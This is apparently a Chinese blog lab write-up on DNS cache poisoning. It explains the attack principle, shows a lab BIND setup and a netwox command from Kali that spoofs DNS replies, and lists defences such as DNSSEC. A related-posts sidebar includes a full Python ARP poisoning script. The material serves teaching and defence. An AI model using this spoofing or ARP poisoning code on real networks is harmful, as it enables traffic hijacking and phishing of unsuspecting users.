DNS毒化攻击及防御

最新推荐文章于 2024-04-25 15:35:02 发布
最新推荐文章于 2024-04-25 15:35:02 发布
阅读量2.2k 收藏 17
点赞数 5
文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43518594/article/details/109191459
版权

攻击技术

攻击原理
现行标准中 DNS 查询通常使用 UDP 协议并且没有任何验证机制,并且根据惯例查询者会接受第一个返回的结果而抛弃之后的。因此只需监控 53 端口(DNS 标准端口)的 UDP查询数据报并分析,一旦发现敏感查询,则抢先向查询者返回一个伪造的错误结果,从而实现 DNS 污染。

DNS污染并无法阻止正确的DNS解析结果返回,但由于旁路产生的数据包发回的速度较国外DNS服务器发回的快,操作系统认为第一个收到的数据包就是返回结果,从而忽略其后收到的数据包,从而使得DNS污染得逞。

实验拓扑

在这里插入图片描述

攻击步骤
1、关闭虚拟机的DNS防护机制
在/etc/bind/named.conf.options 文件中
在这里插入图片描述

2、修改DNS解析的配置文件
在 /etc/bind/named.conf.default-zones 中
在这里插入图片描述

3、在正向解析记录文件中书写文件配置
在/var/cache/bind/ciscon.com 文件中
在这里插入图片描述
3、重启DNS服务
sudo systemctl restart bind9.service

4、更改客户端DNS地址
在这里插入图片描述

5、尝试访问
在这里插入图片描述

6、使用kali进行攻击
sudo netwox 105 -h www.huawei.com -H 192.168.162.132 -a ns.cisco.com -A 192.168.162.131
当客户端访问www.huawei.com这个网址时,kali将捕捉到DNS请求包,然后将上面编辑好的伪装包回复给客户端
在这里插入图片描述

此时客户端也成功登录到www.huawei.com这个网页上了
在这里插入图片描述
注意:在我们的DNS服务器中并没有对www.huawei.com的地址进行解析

在这里插入图片描述
我们在kali上抓包也可以看到,DNS应答包中的源IP是192.168.162.131,这是kali伪造的数据包,是kali伪装成DNS服务器回复的数据包。
在包中也可以看到对www.huawei.com这个地址进行解析的是ns.cisco.com这个DNS服务器。不过这也是kali伪装出来的。

防御技术

  • 及时检查自己的DNS服务器是否存在DNS缓存中毒漏洞,如果发现了自己的DNS服务器存在该漏洞就可以在被攻击前采取措施修补,避免攻击事件的发生。
  • 随机选择一个端口作为DNS用途。
  • 加密所有对外的数据流,对服务器来说就是尽量使用SSH之类的有加密支持的协议,对一般用户应该用PGP之类的软件加密所有发到网络上的数据。
  • 及时刷新DNS,DNS缓存会被重建,再次用域名访问IP服务器,故障消失。
  • 采用域名系统安全协议(DNSSEC)机制,依靠公钥技术对于包含在DNS中的信息创建密码签名。
楓~
关注
  • 5
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DNS缓存投攻击原理与防御策略.pdf
06-03
DNS缓存投攻击原理与防御策略论文,转载自知网!
dns重定向_【资讯】SAD DNS——新的缺陷重新启用 DNS 缓存中攻击
weixin_39624094的博客
11-29 188
来自加利福尼亚大学和清华大学的一群学者发现了一系列严重的安全漏洞,这些漏洞可能导致DNS缓存中攻击死灰复燃。这种技术被称为“SAD DNS攻击”(Side-channel AttackeD DNS的缩写),该技术使攻击者可以进行路径外攻击,将最初发往特定域的所有流量重新路由到其控制下的服务器,从而允许他们窃听和篡改通信。研究人员表示:“这是一个重要的里程碑,这是第一个可武器化的网络侧通...
简析DNS攻击的常见类型、危害与防护建议_dns隧道攻击怎么防护
yy1715713348的博客
02-16 1034
域名系统(DNS)是一种结构化的命名系统,是Internet基础结构的关键部分。目前,针对DNS攻击已经成为网络安全中的一个严重问题,每年都有数千个网站成为此类攻击的受害者。为了保护网络免受此类攻击,重要的是要了解不同类型的DNS攻击,并找到相对应的缓解方法。
ARP毒化攻击
qq_28692269的博客
03-14 731
ARP毒化攻击什么是ARP协议?ARP报文格式wireshark抓包分析ARP毒化攻击信息拦截 什么是ARP协议? 根据计算机网络OSI七层参考模型,ARP属于第二层,数据链路层,携带计算机网卡的MAC地址。两台主机之间的通信必须知道对方的MAC地址才能进行通信,但是在只知道IP地址的情况下没有MAC地址如何进行通信呢?这时候就是ARP地址解析协议发挥作用的时候了。但是ARP是如何从IP地址解析到...
安全学习篇:ARP缓存中攻击
城南以南花亦开
07-24 6648
个人博客主页:https://www.boolo.top 【本文博客同步地址】 了解ARP的基础知识,逐步讲解ARP缓存中攻击的原理,并进行相应的攻击演示。 一、ARP基础知识 1. ARP简介 ARP即地址解析协议(Address Resolution Protocol)的简称,该协议是TCP/IP协议簇里面的一个协议。ARP的主要作用是根据IP
对ARP病攻击的防范和处理及相应工具方法
大IT职男日志
07-25 7119
如果在使用网络时速度越来越慢,直至掉线,而过一段时间后又可能恢复正常,或者,重启路由器后又可正常上网。故障出现时,网关ping 不通或有数据丢失,那么很有可能是受到了ARP病攻击。下面我就谈谈对这种情况处理的一些意见。  一、首先诊断是否为ARP病攻击  1、当发现上网明显变慢,或者突然掉线时,我们可以用arp-命令来检查ARP表:(点击 开始 按钮->选择运行->...
DNS毒化攻击
ChenD的学习笔记
10-26 811
DNS 查询通常使用UDP协议并且没有任何验证机制,并且只会接受第一个返回的结果,利用中间人攻击,我们向靶机抢先发送一个伪造的错误结果,从而实现DNS毒化,如果错误结果指向攻击者制作的克隆网站,则可能会泄露密码。这行的意思是,当我访问这个域名的时候,自动跳转到172.20.10.11也就是我们克隆的登陆页面上。因为咱们演示的是克隆所以前面这里写的是考试酷的网址,我们正好在用考试酷,就用它演示。会自动跳转到我们克隆的网页中,但是考试酷做了防护,提交不了账号密码。打开 ettercap 图像化界面。
DNS毒化污染 钓鱼实验
m0_51498031的博客
04-23 2939
1、将kali和win7 桥接到物理的网卡,并且检测互通和外网也能相通: 2、在kali上 修改 erttercap 的配置文件 vim /etc/ettercap/etter.dns *  A   192.168.0.107 *  PTR   192.168.0.107 ( A和PTR 指向的地址是kali自己的地址 ) 3、启动Apache服务器 service apache2 start 4、启动 ettercap 图像化界面 ettercap -G: 在对ett...
【KALI网络安全DNS攻击(劫持和欺骗)与网络钓鱼的模拟和预防(1)
VMware, Windows, Linux, Cisco, Container, Kubernetes, Kali
03-20 3950
1、DNS概述 关于DNS的定义,作用,分类以及工作原理,我已经在【Windows Server 2019】DNS服务器的配置与管理——理论】这篇博客中陈述过。 要预防DNS劫持,必须了解它的攻击原理和过程 声明 本博客不是在向大家展示这些攻击的方法,而是让大家尽可能的了解DNS攻击的手段以及如何采取必要的预防措施,来确保更安全地上网。 2、DSN劫持(DNS Hijacking)概述 2.1.什么是DNS劫持 DNS劫持全称为域名服务器劫持,又称DNS重定向(DNS redirection)。它是一种
DDOS攻击防护DNS
qq_37980458的博客
10-11 4141
DNS request flood 黑客控制僵尸网络DNS服务器发送大量不存在的域名的解析请求,最终导致服务器因大量DNS请求而超载。   1.TC源认证 ①客户端发送的DNS请求报文长度超过告警阈值,启动源认证机制。 ②拦截DNS请求,将TC标志位置为1并进行回应,要求客户端以TCP方式重新发起DNS查询。 ③如果这个源是虚假源,则不会正常响应这个DNS回应报文,更不会重新通过TC...
常见的DNS攻击与相应的防御措施
qq_32044265的博客
04-13 2510
重点介绍安全领域比较常见的一些DNS攻击以及相应的防御措施:DNS Request Flood攻击防御DNS Reply Flood攻击防御DNS缓存投攻击防御
论文研究-DNS缓存毒化攻击和解决方案DNSSEC .pdf
08-20
DNS缓存毒化攻击和解决方案DNSSEC,谭果,,DNS是Internet的基础构件中十分重要的一个部分。随着各种针对DNS攻击形式,尤其是DNS缓存毒化攻击产生并对Internet安全产生严重危害,DN
交换机毒化攻击
08-14
局域网内攻击交换机,填满mac表.用winpcap编写的发包程序,稍作简单的改动即可发送其他数据包。
机器学习系统毒化攻击综述.pdf
09-24
机器学习系统毒化攻击综述.pdf
交换机毒化攻击模拟攻击(linux)
10-13
交换机毒化攻击模拟攻击(linux) 可调整攻击力度与时间,附加对当前网络延迟的测试,程序画出延迟与吞吐量曲线图,此功能目前还不是很完善,数据处理只是取得平均值,还未用数学统计的方法处理,仅供参考!
基于区块链的命名数据网络内容毒化攻击抵御机制.pdf
08-15
#资源达人分享计划#
SD-WAN怎样保障网络稳定
最新发布
TIANGEKUAJING的博客
04-25 257
随着企业网络的日益复杂,如何确保线路的稳定性和高效性成为了网络管理的一大挑战。尤其是在线路出现故障、质量下降或拥塞时,如何快速响应并切换到最佳线路,就显得尤为重要。SD-WAN,作为一种新型的网络架构,为用户提供了灵活应对各种网络问题的能力。
网络安全之反弹Shell
小飞的博客
04-12 1577
网络安全和渗透测试领域,“正向Shell”(Forward Shell)和"反向Shell"(Reverse Shell)是两种常用的技术手段,用于建立远程访问目标计算机的会话。这两种技术都可以让攻击者在成功渗透目标系统后执行命令,但它们在建立连接的方式上有所不同。
网工常用工具——tcping
qq_36382667的博客
04-25 495
tcping 是一个网络诊断工具,主要用于测试TCP端口的可达性和连接建立时间。相较于传统的ping命令(基于Internet Control Message Protocol, ICMP),tcping 更侧重于检查传输层(TCP)的服务状态,而非网络层(IP)的连通性。
用python编写arp毒化代码
04-29
以下是一个简单的 Python 代码示例,用于执行 ARP 毒化攻击: ```python import os import sys import time from scapy.all import * # 定义网卡和目标IP地址 iface = "eth0" target_ip = "192.168.1.100" # 获取目标MAC地址 def get_mac(ip): ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip), timeout=2, iface=iface, inter=0.1) for snd, rcv in ans: return rcv.sprintf(r"%Ether.src%") # 发送欺骗ARP数据包 def poison_target(): target_mac = get_mac(target_ip) packet = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc="192.168.1.1") send(packet, iface=iface) print("[+] Sent ARP poison packet to " + target_ip) # 恢复ARP表 def restore_target(): target_mac = get_mac(target_ip) gateway_mac = get_mac("192.168.1.1") packet = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc="192.168.1.1", hwsrc=gateway_mac) send(packet, iface=iface, count=5) print("[+] Sent ARP restore packet to " + target_ip) # 开始攻击 try: print("[+] Starting ARP poison attack...") while True: poison_target() time.sleep(2) # 每2秒执行一次攻击 except KeyboardInterrupt: print("[!] Exiting ARP poison attack...") restore_target() sys.exit(0) ``` 请注意,此代码仅供学习和研究目的,不应用于非法用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值